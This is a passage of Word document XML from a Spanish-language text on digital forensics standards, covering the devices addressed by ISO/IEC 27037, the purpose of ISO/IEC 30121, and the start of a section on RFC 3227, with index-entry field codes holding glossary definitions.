          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 27037 proporciona orientación para los siguientes dispositivos y circunstancias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084DC29" w14:textId="204BDEEE" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Medios de almacenamiento digitales utilizados en equipos varios como por ejemplo discos duros, disquetes, discos </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>magnetoópticos</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> y ópticos y otros similares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FED6F4" w14:textId="4292CB5B" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Teléfonos móviles, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PDA's</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, tarjetas de memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289221D" w14:textId="7936AC49" w:rsidR="00D504A6" w:rsidRPr="001D7290" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sistemas de navegación móvil (</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GPS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>GPS (Global Positioning System): Sistema de navegación por satélite que proporciona información de ubicación y tiempo en todo el mundo."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE7359" w14:textId="7E6CB7CD" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cámaras de video y cámaras digitales (incluyendo circuitos cerrados de televisión).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CBFBBF" w14:textId="0B610D27" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ordenadores estándares con conexiones a redes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138593C6" w14:textId="005117DC" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Redes basadas en protocolos </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>TCP/IP (Transmission Control Protocol/Internet Protocol): Conjunto de protocolos de comunicación utilizados para interconectar dispositivos de red en Internet."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y otros protocolos digitales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682CE0D" w14:textId="388F8B51" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Otros dispositivos con funcionalidades similares a las descritas anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA34D60" w14:textId="399C73CA" w:rsidR="00D504A6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumiendo, se puede destacar que esta norma ofrece orientación sobre el manejo de las pruebas digitales. Siguiendo las directrices de esta norma se asegura que la evidencia digital potencial se recoge de manera válida a efectos legales para facilitar su aportación en juicios y procesos legales. </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Además,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cabe destacar que cubre una amplia gama de tipos de dispositivos y situaciones, por lo que la orientación dentro de la norma es ampliamente aplicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EA351" w14:textId="48069312" w:rsidR="00F149F6" w:rsidRPr="00D504A6" w:rsidRDefault="00D504A6" w:rsidP="00D504A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Se dispone de una copia de la ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D504A6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 27037 en inglés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647739E1" w14:textId="5AAFA785" w:rsidR="006F21A3" w:rsidRPr="00D16863" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/IEC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO/IEC: Serie de estándares elaborados conjuntamente por ISO y la Comisión Electrotécnica Internacional (IEC)."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30121 es la norma internacional para el análisis forense digital. Define los requisitos mínimos que todas las organizaciones deben cumplir para estar preparados ante un análisis forense digital. La primera edición de la norma se publicó en 2015. Desde entonces, se han realizado varias actualizaciones importantes para reflejar las</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF457A9" w14:textId="77777777" w:rsidR="006F21A3" w:rsidRPr="00D16863" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nuevas tecnologías y la evolución de los procedimientos de investigación criminal. Ha sido adoptada por muchas organizaciones de todo el mundo como base de las mejores prácticas para el manejo de las pruebas digitales, maximizando la disponibilidad y acceso a esta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F243FE2" w14:textId="7B139A28" w:rsidR="00D504A6" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La ISO</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/IEC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>ISO/IEC: Serie de estándares elaborados conjuntamente por ISO y la Comisión Electrotécnica Internacional (IEC)."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30121 se creó para garantizar que las pruebas digitales se traten de forma coherente en las </w:t>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distintas organizaciones y para ayudar a garantizar que las pruebas digitales puedan utilizarse como prueba en los procedimientos judiciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27933D" w14:textId="60CD61C8" w:rsidR="00D504A6" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:t>Norma RFC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006F21A3">
        <w:t xml:space="preserve"> 3227.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31595FCA" w14:textId="115C9FD8" w:rsidR="00DE5C26" w:rsidRPr="00DE5C26" w:rsidRDefault="00DE5C26" w:rsidP="00DE5C26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155731871 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia VI.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DE5C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AFFEEF" w14:textId="3B192C67" w:rsidR="006F21A3" w:rsidRPr="00D16863" w:rsidRDefault="006F21A3" w:rsidP="006F21A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Otra norma destacable para mencionar es </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la RFC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
